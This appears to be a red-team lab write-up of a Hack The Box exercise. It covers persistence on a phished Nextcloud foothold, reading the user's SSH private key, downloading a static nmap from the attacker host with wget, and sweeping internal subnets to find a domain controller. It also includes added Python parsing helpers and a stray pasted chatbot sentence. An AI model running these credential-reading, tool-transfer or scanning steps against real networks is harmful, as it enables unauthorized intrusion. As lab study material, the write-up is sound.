Red Team Operation Live-20241102

Administrator
2025-03-18 / 0 comments / 0 likes / 9 reads / 0 words

Red Team Penetration Practice Notes: Internal Network Foothold and Information Gathering

I. Foothold and Persistence Strategy

1. Importance of the Foothold

  • Nextcloud credentials obtained through phishing were used to establish the initial foothold.

  • The fourth flag is located at the foothold; the lab has 20 flags in total.

  • The initial foothold is the basis for the whole engagement, so its stability must be ensured.

2. Why Persistence Is Necessary

  • Persistence is the first task after gaining a foothold, so that the foothold is not lost.

  • If the administrator notices the intrusion and changes passwords or hardens the system, the foothold is lost.

  • Persistence strategies include creating new users, deploying backdoors, exploiting system vulnerabilities, and so on.

3. System Enumeration and Caution

  • After entering the system, act carefully and check whether any defensive system is monitoring.

  • Check the system's update and security status.

  • The system has 36 unapplied updates, 31 of which are security updates.

  • The login banner shows "machine name: nextcloud", indicating this machine hosts the Nextcloud application.

4. Hidden Files and Key Analysis

  • Important hidden files discovered: .bash_history and SSH keys.

  • RSA public and private key files were found in the user's home directory.

  • The private key is encrypted and requires a passphrase before it can be used.

  • The key appears to be kept only for storage and is not in the standard .ssh directory.

# list hidden files
ls -la
sshuser@nextcloud:~$ ls -al
total 40
drwxr-xr-x 6 sshuser sshuser 4096 Jul 18  2024 .
drwxr-xr-x 3 root    root    4096 Sep 17  2020 ..
lrwxrwxrwx 1 root    root       9 Apr 17  2020 .bash_history -> /dev/null
-rw-r--r-- 1 sshuser sshuser  220 Feb 23  2020 .bash_logout
-rw-r--r-- 1 sshuser sshuser 3771 Feb 23  2020 .bashrc
drwx------ 2 sshuser sshuser 4096 Feb 23  2020 .cache
-rw-rw-r-- 1 sshuser sshuser   30 Sep  7  2020 flag.txt
drwx------ 3 sshuser sshuser 4096 Feb 23  2020 .gnupg
drwxrwxr-x 3 sshuser sshuser 4096 Sep  7  2020 .local
-rw-r--r-- 1 sshuser sshuser  807 Feb 23  2020 .profile
drwx------ 2 sshuser sshuser 4096 Feb 23  2020 .ssh
sshuser@nextcloud:~$

# view the SSH keys
cat .ssh/id_rsa
cat .ssh/id_rsa.pub
sshuser@nextcloud:~$ cat .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,C373000CFD54B3F4508922250C171ED4
[encrypted key material omitted]
-----END RSA PRIVATE KEY-----
sshuser@nextcloud:~$ cat .ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCVM2fM6ou5UOJL0k5J/wF+QTU/y9eR0I79Hfl0841XLe20MTm/ySzyDAjYrJopzppSRVNu7YKldWBM/apGGdrWm1cRBtX94wBSyr4LGgeTiwv8Chj9ifHaqvthDuWdlTHFy1qMrH5CvJBqTmDP/9soV6hUl89n4Ksj8qM+K5Yb6lVdqXa/VtGl58H5xEx8XRhRJvCh8VAblf3UNHHiKDtcpuv2xGGnRATcqlLtb+P5NJxPv6ezGkYdoxZPHzwD3Gch94Wlve+15k3t2EKvFVVt4Ofxsqu9Ku4+BBTkPqDs2Y6/NgY+IGtPOpNHCNUpd8g8SaZ4TutbyCXXd1ESe78X sshuser@nextcloud
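To check whether a private key found during an audit is protected at rest, here is an added Python example (not code from the original post): it reads the PEM container headers, the RFC 1421 `Proc-Type`/`DEK-Info` headers seen in the `cat .ssh/id_rsa` output above, and the cipher and KDF names at the start of the newer `openssh-key-v1` container. The sample inputs are constructed, with placeholder key material.

```python
import base64
import struct
from typing import Dict, Optional

OPENSSH_MAGIC = b"openssh-key-v1\0"


def _read_ssh_string(blob: bytes, pos: int):
    """Read one SSH wire-format string (uint32 length + bytes) starting at pos."""
    (length,) = struct.unpack_from(">I", blob, pos)
    start = pos + 4
    return blob[start:start + length], start + length


def inspect_private_key(pem: str) -> Dict[str, Optional[object]]:
    """Report the key container format and whether the key material is encrypted at rest."""
    lines = [ln.strip() for ln in pem.strip().splitlines()]
    if len(lines) < 2 or not lines[0].startswith("-----BEGIN "):
        raise ValueError("not a PEM-armoured key")
    label = lines[0][len("-----BEGIN "):].rstrip("-").strip()
    body = lines[1:-1]

    if label == "OPENSSH PRIVATE KEY":
        # New OpenSSH container: cipher and KDF names follow the magic directly.
        blob = base64.b64decode("".join(body))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, pos = _read_ssh_string(blob, len(OPENSSH_MAGIC))
        kdf, _ = _read_ssh_string(blob, pos)
        cipher_name = cipher.decode()
        encrypted = cipher_name != "none"
        return {"format": "openssh-key-v1", "encrypted": encrypted,
                "cipher": cipher_name if encrypted else None, "kdf": kdf.decode()}

    if label == "ENCRYPTED PRIVATE KEY":
        # PKCS#8 EncryptedPrivateKeyInfo is encrypted by definition; parameters live in the ASN.1.
        return {"format": "PKCS#8 EncryptedPrivateKeyInfo", "encrypted": True,
                "cipher": None, "kdf": None}

    # Traditional PEM (RSA/DSA/EC PRIVATE KEY): encryption is signalled by RFC 1421 headers.
    headers = {}
    for ln in body:
        if ln == "":
            break  # a blank line ends the header block; base64 follows
        if ":" in ln:
            key, value = ln.split(":", 1)
            headers[key.strip()] = value.strip()
    encrypted = headers.get("Proc-Type", "").endswith("ENCRYPTED")
    dek = headers.get("DEK-Info", "")
    return {"format": label, "encrypted": encrypted,
            "cipher": dek.split(",")[0] if encrypted and dek else None,
            "kdf": "legacy EVP_BytesToKey (MD5)" if encrypted else None}


# Constructed sample: the headers seen in the page's `cat .ssh/id_rsa`, with placeholder key material.
SAMPLE_LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,C373000CFD54B3F4508922250C171ED4

MIIEpAIBAAKCAQEAplaceholderplaceholderplaceholderplaceholder
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + data


def build_openssh_sample(cipher: str, kdf: str) -> str:
    """Construct a truncated openssh-key-v1 container (header fields only) for demonstration."""
    blob = OPENSSH_MAGIC + _ssh_string(cipher.encode()) + _ssh_string(kdf.encode())
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


if __name__ == "__main__":
    for name, pem in [("legacy", SAMPLE_LEGACY_ENCRYPTED),
                      ("openssh-encrypted", build_openssh_sample("aes256-ctr", "bcrypt")),
                      ("openssh-plain", build_openssh_sample("none", "none"))]:
        print(name, inspect_private_key(pem))
```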

II. Internal Network Enumeration and Topology Exploration

1. Network Information Gathering

  • Use the ifconfig / ip a commands to view the NIC configuration.

  • Main subnet discovered: 192.168.20.31 (a class C subnet).

  • Docker container subnet discovered: 172.17.0.1 (a class B subnet).

  • Discovered the pattern by which internal IPs correspond to the external 10.10.x.x addresses.


    [image: login banner with update notice (image-nzff.png)]

    36 updates can be applied immediately.
    31 of these updates are standard security updates.
    To see these additional updates run: apt list --upgradable

    Combining this with the change records on HTB, we can see that

# view network configuration
ip a
ifconfig

2. Tool Preparation and Static Binaries

You can find statically compiled standalone binaries (static binaries) at the following sites or tool repositories, similar to the statically compiled packages provided by tools such as soar:

1. Static binary resources

    Resource                    Description
    Static-Binaries (github)    A GitHub project providing statically compiled versions of various tools
    Static Binaries (jart)      Static binaries from Cosmopolitan that run on several platforms
    uutils (Rust coreutils)     Rust implementation of coreutils; supports static compilation
    musl.cc                     Statically compiled binaries built on musl libc
    busybox.net                 Statically compiled tool collection provided by BusyBox
    Linux Static Binaries       Various statically compiled command-line tools
    Termux Static Binaries      Statically compiled tools for Android/Termux

2. Package managers (with static build support)

Some package managers can themselves download statically compiled binaries:

    Tool                        Description
    Soar                        The soar you are already using; it can search for and download static binaries
    Homebrew                    brew install --build-bottle can be used to obtain independently built tools
    Nix                         nix-env -iA nixpkgs.<package> can find some statically compiled software
    Alpine Linux packages       Alpine provides tools compiled statically against musl
    AppImageHub                 AppImage executables for Linux (some are statically compiled)

3. Direct downloads of statically compiled tools

Static builds of some common tools can be downloaded directly:

    Tool                        Description
    Nmap Static Build           Prebuilt static nmap
    FFmpeg Static Builds        Static ffmpeg binaries
    Go binaries                 Tools written in Go are usually statically compiled
    Rust binaries               Core tools written in Rust support static compilation
    Musl binaries               Various Linux tools compiled against musl

If you frequently need statically compiled tools, it is recommended to use soar, nix or musl.cc to obtain the binaries you need, or look on GitHub for projects dedicated to providing static builds. Tell me which tools you are looking for and I can help you find download links for their static versions.

Check the nmap on the local Kali machine first

  • Because of permission restrictions, scanning tools such as nmap cannot be installed directly on the target.

  • Statically compiled binaries are needed to get around the dependency problem.

    Locate the local nmap

    What we need here is a standalone nmap executable.

    A standalone executable is one whose dependencies are all packaged together into a single ELF file. But in fact, there is no such thing here.

    [image: locating nmap on Kali (image-nraz.png)]

    Check the dependencies

    ┌──(root㉿kali)-[~/Desktop/APTLabs/credentials]
    └─# file /usr/lib/nmap/nmap 
    /usr/lib/nmap/nmap: ELF 64-bit LSB pie executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=5069dad954210da431a93f6279154b3b7a3ffbcf, for GNU/Linux 3.2.0, stripped
    
    ┌──(root㉿kali)-[~/Desktop/APTLabs/credentials]
    └─# ldd /usr/lib/nmap/nmap 
            linux-vdso.so.1 (0x00007ff35c924000)
            libpcre2-8.so.0 => /lib/x86_64-linux-gnu/libpcre2-8.so.0 (0x00007ff35c562000)
            libpcap.so.0.8 => /lib/x86_64-linux-gnu/libpcap.so.0.8 (0x00007ff35c514000)
            libssh2.so.1 => /lib/x86_64-linux-gnu/libssh2.so.1 (0x00007ff35c4cc000)
            libssl.so.3 => /lib/x86_64-linux-gnu/libssl.so.3 (0x00007ff35c3c9000)
            libcrypto.so.3 => /lib/x86_64-linux-gnu/libcrypto.so.3 (0x00007ff35be00000)
            libz.so.1 => /lib/x86_64-linux-gnu/libz.so.1 (0x00007ff35c3a9000)
            liblinear.so.4 => /lib/x86_64-linux-gnu/liblinear.so.4 (0x00007ff35c8f2000)
            liblua5.4.so.0 => /lib/x86_64-linux-gnu/liblua5.4.so.0 (0x00007ff35bdbd000)
            libstdc++.so.6 => /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007ff35ba00000)
            libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007ff35bcd7000)
            libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007ff35bcaa000)
            libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff35b80a000)
            /lib64/ld-linux-x86-64.so.2 (0x00007ff35c926000)
            libdbus-1.so.3 => /lib/x86_64-linux-gnu/libdbus-1.so.3 (0x00007ff35b7b3000)
            libzstd.so.1 => /lib/x86_64-linux-gnu/libzstd.so.1 (0x00007ff35b6eb000)
            libblas.so.3 => /lib/x86_64-linux-gnu/libblas.so.3 (0x00007ff35b676000)
            libsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0 (0x00007ff35b58d000)
            libcap.so.2 => /lib/x86_64-linux-gnu/libcap.so.2 (0x00007ff35c39d000)
    



    What this scenario shows is that you must be able to compile all sorts of tools yourself. Without that ability, this approach cannot be used.

    A point of terminology to note here is the difference between standalone and static binary:
    standalone
    static binary

  • Use the two-packs project to obtain precompiled static binaries

    # download the statically compiled nmap
    wget http://10.10.16.122/nmap

    # verify the file type
    file nmap

    # make it executable
    chmod +x nmap

    # check whether it is a static binary
    ldd nmap
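The `file`/`ldd` check above is driven by what the ELF program headers say. As an added example (not code from the original post), this Python script reads those headers directly and classifies a binary the way `file` does: a `PT_INTERP` entry means dynamically linked, `ET_DYN` without an interpreter means static-pie, and `ET_EXEC` without one means statically linked. `build_sample_elf` constructs minimal, non-runnable ELF images for demonstration; pass a path on the command line to inspect a real file such as a downloaded nmap.

```python
import struct
from typing import Dict, List, Optional, Tuple

ELF_MAGIC = b"\x7fELF"
ELFCLASS64, ELFDATA2LSB = 2, 1
ET_EXEC, ET_DYN = 2, 3
EM_X86_64 = 62
PT_DYNAMIC, PT_INTERP = 2, 3
EHDR_SIZE, PHDR_SIZE = 64, 56


def parse_elf64(data: bytes) -> Dict[str, object]:
    """Parse the ELF64 header fields and program headers needed to classify linkage."""
    if data[:4] != ELF_MAGIC or data[4] != ELFCLASS64 or data[5] != ELFDATA2LSB:
        raise ValueError("not a little-endian ELF64 image")
    e_type, e_machine = struct.unpack_from("<HH", data, 16)
    (e_phoff,) = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    phdrs = []
    for i in range(e_phnum):
        p_type, _flags, p_offset, _vaddr, _paddr, p_filesz = struct.unpack_from(
            "<IIQQQQ", data, e_phoff + i * e_phentsize)
        phdrs.append({"type": p_type, "offset": p_offset, "filesz": p_filesz})
    return {"e_type": e_type, "e_machine": e_machine, "phdrs": phdrs}


def classify_linkage(data: bytes) -> Dict[str, object]:
    """Classify like file(1): PT_INTERP => dynamic; ET_DYN without it => static-pie; else static."""
    info = parse_elf64(data)
    interp: Optional[str] = None
    for ph in info["phdrs"]:
        if ph["type"] == PT_INTERP:
            raw = data[ph["offset"]:ph["offset"] + ph["filesz"]]
            interp = raw.rstrip(b"\0").decode()
    if interp is not None:
        linkage = "dynamically linked"
    elif info["e_type"] == ET_DYN:
        linkage = "static-pie linked"
    else:
        linkage = "statically linked"
    return {
        "linkage": linkage,
        "interpreter": interp,
        "x86_64": info["e_machine"] == EM_X86_64,
        # Only a binary that needs no loader can be dropped on a host lacking matching shared libraries.
        "self_contained": interp is None,
    }


def build_sample_elf(e_type: int, with_dynamic: bool, interp: Optional[str]) -> bytes:
    """Construct a minimal, non-runnable ELF64 image (headers only) for demonstration."""
    phdrs: List[Tuple[int, int, int]] = []  # (p_type, p_offset, p_filesz)
    if with_dynamic:
        phdrs.append((PT_DYNAMIC, 0, 0))
    n_phdrs = len(phdrs) + (1 if interp else 0)
    body_off = EHDR_SIZE + PHDR_SIZE * n_phdrs
    interp_bytes = interp.encode() + b"\0" if interp else b""
    if interp:
        phdrs.append((PT_INTERP, body_off, len(interp_bytes)))
    ident = ELF_MAGIC + bytes([ELFCLASS64, ELFDATA2LSB, 1, 0]) + b"\0" * 8
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", e_type, EM_X86_64, 1, 0, EHDR_SIZE, 0, 0,
                               EHDR_SIZE, PHDR_SIZE, n_phdrs, 64, 0, 0)
    phdr_bytes = b"".join(struct.pack("<IIQQQQQQ", t, 0, off, 0, 0, sz, sz, 1)
                          for t, off, sz in phdrs)
    return ehdr + phdr_bytes + interp_bytes


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(sys.argv[1], classify_linkage(fh.read()))
    else:
        print("static    ", classify_linkage(build_sample_elf(ET_EXEC, False, None)))
        print("static-pie", classify_linkage(build_sample_elf(ET_DYN, True, None)))
        print("dynamic   ", classify_linkage(build_sample_elf(ET_DYN, True, "/lib64/ld-linux-x86-64.so.2")))
```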

3. soar

1. sharun.wrappe

    nmap#sharun.wrappe.alpine.nmap-7.95:pkgcache

  • This is a source package, or a binary package in the standard pkgcache format.

  • Probably a simply packaged nmap executable whose runtime environment is alpine (usually very lightweight, but with dynamic library dependencies).

  • It may depend on shared libraries, so it can fail when copied to a machine without those dependencies (for example libpcap or libssl mismatched or missing).

  • 42MB in size

2. runimage

    nmap#runimage.alpine.nmap-7.95:pkgcache

  • This is a runimage, usually a directly runnable, complete packaged environment.

  • Think of it as a "sandbox" or "image" that lets you run the tool without installing dependencies. It is similar to a container image (chroot, small sandbox), but it still needs soar/runimage support.

  • 42MB in size

3. Inspect the nmap after downloading

Key points:

  • static-pie linked
    Statically compiled + Position Independent Executable (position independent, suitable for all kinds of environments).
    No dependency on shared dynamic libraries, ideal for uploading to internal machines with limited privileges and no internet access!

  • stripped
    ➜ Debug symbols removed: smaller file, faster to execute.

  • x86-64
    ➜ Runs directly on 64-bit internal machines!

4. Serve it over the web with goshs

    You can use python3 -m http.server 9000

    or the newer
    goshs -i 10.10.16.111 -p 9000

5. Run it on the target

6. Test the other one

    End result: both of them run.
    Perfect~

7. Test the last version

    Lightweight version, 4.5MB in size

    ┌──(root㉿kali)-[~/Desktop/APTLabs/soar]
    └─# ./soar-x86_64-linux search nmap                                     
    [-] asnmap#github.com.projectdiscovery.asnmap:bincache (static-HEAD-9eed841-240627T081816:1.1.1) - Tool to gather network ranges using ASN information (30.21 MiB)
    [-] nmap-formatter#github.com.vdjagilev.nmap-formatter:bincache (static-HEAD-ffa7b32-250208T022930:3.0.2) - A tool to convert NMAP results to html, csv, json, markdown, graphviz (dot) or sqlite (31.28 MiB)
    [-] nmapurls#github.com.sdcampbell.nmapurls:bincache (static-HEAD-cc2fb73-240213T060214) - parses Nmap xml reports and outputs a list of http(s) URLs (2.21 MiB)
    [-] ncat#sharun.wrappe.alpine.nmap:pkgcache (archive-7.95) - Concatenate and redirect sockets [nmap] (2.93 MiB)
    [-] nmap#sharun.wrappe.alpine.nmap:pkgcache (archive-7.95) - Network exploration tool and security/port scanner [nmap] (4.50 MiB)
    [-] nping#sharun.wrappe.alpine.nmap:pkgcache (archive-7.95) - Network packet generation tool/ping utility [nmap] (3.73 MiB)
    [-] nmap#runimage.alpine.nmap:pkgcache (runimage-7.95) - Network exploration tool and security/port scanner (42.61 MiB)
    Showing 7 of 7
                                                                                                                                               
    ┌──(root㉿kali)-[~/Desktop/APTLabs/soar]
    └─# ./soar-x86_64-linux download nmap#sharun.wrappe.alpine.nmap:pkgcache
    Downloading package: nmap#sharun.wrappe.alpine.nmap
     [━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━] 1.26 MiB/s     4.32 MiB/4.32 MiB                                                                                                                                                
    ┌──(root㉿kali)-[~/Desktop/APTLabs/soar]
    └─# ls -liah                                          
    总计 12M
    3147099 drwxr-xr-x  2 root root 4.0K  3月22日 06:03 .
    3146321 drwxr-xr-x 13 root root 4.0K  3月20日 03:44 ..
    3146681 -rwxr-xr-x  1 root root 4.4M  3月22日 06:03 nmap
    3147137 -rwxr-xr-x  1 root root 7.6M  3月10日 12:37 soar-x86_64-linux
    



4. Network Scanning Strategy

  • Use several scanning methods to make sure no host is missed.

    [image: nmap mass_dns warning (image-amyk.png)]

  • Because mass_dns cannot read the DNS server information from /etc/resolv.conf, it does not know which servers to send DNS queries to.

  • As a result it cannot perform any DNS resolution, including reverse DNS lookups (resolving IP addresses to hostnames).

  • The program suggests trying the --system-dns option (obtain the system DNS settings another way) or using --dns-servers to specify DNS servers manually.

  • --system-dns
    The --system-dns option forces nmap to use the system's DNS resolver.

    Use the --system-dns option (if supported): run mass_dns with --system-dns added.
    This may make mass_dns try other system calls or mechanisms to find the DNS servers.

    sshuser@nextcloud:~/nmap$ ./nmap -sn 192.168.20.0/24
    Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-03 04:19 UTC
    mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers: No such file or directory (2)
    mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
    Nmap scan report for 192.168.20.1
    Host is up (0.00043s latency).
    Nmap scan report for 192.168.20.15
    Host is up (0.0012s latency).
    Nmap scan report for 192.168.20.31
    Host is up (0.00084s latency).
    Nmap done: 256 IP addresses (3 hosts up) scanned in 3.01 seconds

    With the --system-dns option added:

    sshuser@nextcloud:~/nmap$ ./nmap -sn 192.168.20.0/24 --system-dns
    Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-03 04:22 UTC                                                                            
    Nmap scan report for 192.168.20.1
    Host is up (0.00055s latency).
    Nmap scan report for 192.168.20.15
    Host is up (0.00056s latency).
    Nmap scan report for 192.168.20.31
    Host is up (0.00012s latency).
    Nmap done: 256 IP addresses (3 hosts up) scanned in 17.63 seconds
    

  • Subnets discovered: 192.168.20.x, 192.168.21.x, 192.168.5.x, 172.17.0.x

    sshuser@nextcloud:~/saomiao$ arp
    Address                  HWtype  HWaddress           Flags Mask            Iface
    172.17.0.4               ether   02:42:ac:11:00:04   C                     docker0
    192.168.20.10            ether   00:50:56:b0:ea:cd   C                     ens160
    192.168.20.1             ether   00:50:56:b0:d5:e6   C                     ens160
    172.17.0.3               ether   02:42:ac:11:00:03   C                     docker0
    192.168.20.15            ether   00:50:56:b0:9d:a4   C                     ens160
    172.17.0.2               ether   02:42:ac:11:00:02   C                     docker0
    172.17.0.5               ether   02:42:ac:11:00:05   C                     docker0

    Class B subnet, /16

    ./nmap -sn 192.168.0.0/16 --system-dns

    sshuser@nextcloud:~/saomiao$ ./nmap -sn 192.168.0.0/16 --system-dns
    Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 15:14 UTC
    Nmap scan report for 192.168.5.13
    Host is up (0.00051s latency).
    Nmap scan report for 192.168.5.21
    Host is up (0.0019s latency).
    Nmap scan report for 192.168.5.62
    Host is up (0.00044s latency).
    Nmap scan report for 192.168.5.74
    Host is up (0.00077s latency).
    Nmap scan report for 192.168.5.88
    Host is up (0.00085s latency).
    Nmap scan report for 192.168.5.231
    Host is up (0.00034s latency).
    Nmap scan report for 192.168.5.242
    Host is up (0.0019s latency).

    The addresses above are one group; the ones below are another group.

    Nmap scan report for 192.168.20.1
    Host is up (0.00041s latency).
    Nmap scan report for 192.168.20.15
    Host is up (0.0011s latency).
    Nmap scan report for 192.168.20.31
    Host is up (0.00085s latency).
    Nmap scan report for 192.168.21.123
    Host is up (0.0018s latency).

    sshuser@nextcloud:~/saomiao$ ./nmap -sn 172.17.0.0/16 --system-dns
    Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 15:59 UTC
    Nmap scan report for 172.17.0.1
    Host is up (0.00037s latency).
    Nmap scan report for 172.17.0.2
    Host is up (0.00030s latency).
    Nmap scan report for 172.17.0.3
    Host is up (0.00035s latency).
    Nmap scan report for 172.17.0.4
    Host is up (0.00040s latency).
    Nmap scan report for 172.17.0.5
    Host is up (0.00076s latency).


  • Use the ARP cache to discover hosts that did not respond to ping (in particular the DC).

  • Scanning from inside the internal network is safer than scanning from the outside; the traffic it generates is less likely to be detected.

    # basic scan (--system-dns takes no value; a resolver is named with --dns-servers)
    ./nmap -sn 192.168.20.0/24 --dns-servers 192.168.20.10

    # full port scan
    ./nmap -p- 192.168.20.31,15,10 --dns-servers 192.168.20.10

    # check the ARP cache
    arp -a

5. Network Topology Analysis

  • Four main internal machines found: 192.168.20.10 (DC), 192.168.20.15, 192.168.20.31, 192.168.21.123

    Cubano.local  DC.Cubano.local  192.168.23.10





    sshuser@nextcloud:~/saomiao$ ./nmap -sT -sC -sV -O 192.168.20.1,15,31 --system-dns
    OS scan requested but I cannot find nmap-os-db file.
    QUITTING!

    -O OS detection requires root privileges

    sshuser@nextcloud:~/saomiao$ ./nmap -sT 192.168.20.1,15,31 --system-dns
    Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 16:05 UTC
    Unable to find nmap-services!  Resorting to /etc/services
    Unable to find nmap-protocols!  Resorting to /etc/protocols
    ==================================================================
    "Unable to find nmap-services!" and "Unable to find nmap-protocols!"
    These two messages mean this nmap could not find its bundled service and protocol database files:

    nmap-services: maps port numbers to service names (e.g. 80 -> http)
    nmap-protocols: maps protocol names to protocol numbers (e.g. TCP is 6)
    ==================================================================
    Nmap scan report for 192.168.20.1
    Host is up (0.00056s latency).
    Not shown: 1153 filtered tcp ports (no-response)
    PORT   STATE SERVICE
    22/tcp open  ssh
    53/tcp open  domain
    80/tcp open  http

    Nmap scan report for 192.168.20.15
    Host is up (0.00066s latency).
    Not shown: 1154 filtered tcp ports (no-response)
    PORT    STATE SERVICE
    80/tcp  open  http
    443/tcp open  https

    Nmap scan report for 192.168.20.31
    Host is up (0.00024s latency).
    Not shown: 1151 closed tcp ports (conn-refused)
    PORT     STATE SERVICE
    22/tcp   open  ssh
    25/tcp   open  smtp
    53/tcp   open  domain
    443/tcp  open  https
    8080/tcp open  http-alt

    Nmap done: 3 IP addresses (3 hosts up) scanned in 22.24 seconds
    sshuser@nextcloud:~/saomiao$


  • Discovered the internal IP structure that corresponds to the external network: external 10.10.x.x maps to internal 192.168.5.x.

  • Pay particular attention to host 192.168.20.10; its hostname and open ports confirm it is the domain controller (DC).

    sshuser@nextcloud:~/saomiao$ ./nmap 192.168.20.10 --system-dns
    Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 16:10 UTC
    Unable to find nmap-services!  Resorting to /etc/services
    Unable to find nmap-protocols!  Resorting to /etc/protocols

    Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
    "Note: Host seems down"
    This means nmap could not ping the target host (192.168.20.10).
    The host firewall blocks ICMP Echo requests (ping packets).
    -Pn: skip the ping and scan directly

    Nmap done: 1 IP address (0 hosts up) scanned in 3.01 seconds
    sshuser@nextcloud:~/saomiao$

    sshuser@nextcloud:~/saomiao$ ./nmap 192.168.20.10 --system-dns -Pn
    Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 16:10 UTC
    Unable to find nmap-services!  Resorting to /etc/services
    Unable to find nmap-protocols!  Resorting to /etc/protocols
    Nmap scan report for 192.168.20.10
    Host is up (0.00051s latency).
    Not shown: 1147 filtered tcp ports (no-response)
    PORT    STATE SERVICE
    53/tcp  open  domain
    88/tcp  open  kerberos
    135/tcp open  epmap
    139/tcp open  netbios-ssn
    389/tcp open  ldap
    445/tcp open  microsoft-ds
    464/tcp open  kpasswd
    593/tcp open  unknown
    636/tcp open  ldaps

    Nmap done: 1 IP address (1 host up) scanned in 10.02 seconds
    sshuser@nextcloud:~/saomiao$





  • Build the internal network topology diagram to understand the network architecture.
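Two of the steps above, cross-checking the ping sweep against the ARP cache to find hosts that did not answer (the DC here) and confirming the DC from its open ports, can be automated over nmap's normal output. This added Python example is not code from the original post: it parses the scan and arp text, reports neighbours present in the cache but absent from the sweep, and flags hosts that expose Kerberos (88) and LDAP (389) together. The sample outputs are constructed, abridged from the scans shown on this page.

```python
import re
from typing import Dict, List, Set

# Constructed samples, abridged from the nmap and arp output shown on this page.
PING_SWEEP = """\
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-03 04:22 UTC
Nmap scan report for 192.168.20.1
Host is up (0.00055s latency).
Nmap scan report for 192.168.20.15
Host is up (0.00056s latency).
Nmap scan report for 192.168.20.31
Host is up (0.00012s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 17.63 seconds
"""

ARP_TABLE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
172.17.0.4               ether   02:42:ac:11:00:04   C                     docker0
192.168.20.10            ether   00:50:56:b0:ea:cd   C                     ens160
192.168.20.1             ether   00:50:56:b0:d5:e6   C                     ens160
192.168.20.15            ether   00:50:56:b0:9d:a4   C                     ens160
"""

PORT_SCAN = """\
Nmap scan report for 192.168.20.15
Host is up (0.00066s latency).
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap scan report for 192.168.20.10
Host is up (0.00051s latency).
PORT    STATE SERVICE
53/tcp  open  domain
88/tcp  open  kerberos
135/tcp open  epmap
389/tcp open  ldap
445/tcp open  microsoft-ds
464/tcp open  kpasswd
636/tcp open  ldaps
"""

IPV4_AT_END = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})\)?$")
OPEN_PORT = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
ARP_ROW = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+ether\s+([0-9a-f:]{17})")

# Ports that together identify an Active Directory domain controller.
DC_PORTS = {53: "dns", 88: "kerberos", 389: "ldap", 445: "smb", 464: "kpasswd", 636: "ldaps"}


def parse_nmap(output: str) -> Dict[str, Dict[int, str]]:
    """Map each host in nmap's normal output to its open TCP ports (empty for -sn sweeps)."""
    hosts: Dict[str, Dict[int, str]] = {}
    current = None
    for line in output.splitlines():
        line = line.strip()
        if line.startswith("Nmap scan report for "):
            m = IPV4_AT_END.search(line)  # handles "for 10.0.0.1" and "for name (10.0.0.1)"
            current = m.group(1) if m else None
            if current:
                hosts[current] = {}
        elif current:
            m = OPEN_PORT.match(line)
            if m:
                hosts[current][int(m.group(1))] = m.group(2)
    return hosts


def parse_arp(output: str) -> Dict[str, str]:
    """Map IP -> MAC from the output of `arp`."""
    neighbours: Dict[str, str] = {}
    for line in output.splitlines():
        m = ARP_ROW.match(line.strip())
        if m:
            neighbours[m.group(1)] = m.group(2)
    return neighbours


def silent_neighbours(sweep: str, arp: str, prefix: str) -> Set[str]:
    """Hosts the kernel has exchanged frames with (ARP cache) that the ping sweep did not report."""
    reported = set(parse_nmap(sweep))
    cached = {ip for ip in parse_arp(arp) if ip.startswith(prefix)}
    return cached - reported


def domain_controllers(scan: str) -> Dict[str, List[int]]:
    """Hosts whose open ports carry the DC signature: Kerberos 88 and LDAP 389 together."""
    found: Dict[str, List[int]] = {}
    for ip, ports in parse_nmap(scan).items():
        if 88 in ports and 389 in ports:
            found[ip] = sorted(p for p in ports if p in DC_PORTS)
    return found


if __name__ == "__main__":
    print("in ARP cache but not in sweep:", silent_neighbours(PING_SWEEP, ARP_TABLE, "192.168.20."))
    print("domain controllers:", domain_controllers(PORT_SCAN))
```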

6. Service Identification and Analysis

  • Host 192.168.20.10 (DC) exposes the typical domain controller ports: 53 (DNS), 88 (Kerberos), 389 (LDAP), etc.

  • Host 192.168.20.15 exposes ports 80 and 443 and is probably a web server.

  • Host 192.168.21.123 exposes port 443 and runs ManageEngine ServiceDesk Plus.

  • Hosts 172.17.0.x expose several ports that correspond to the external-facing services.

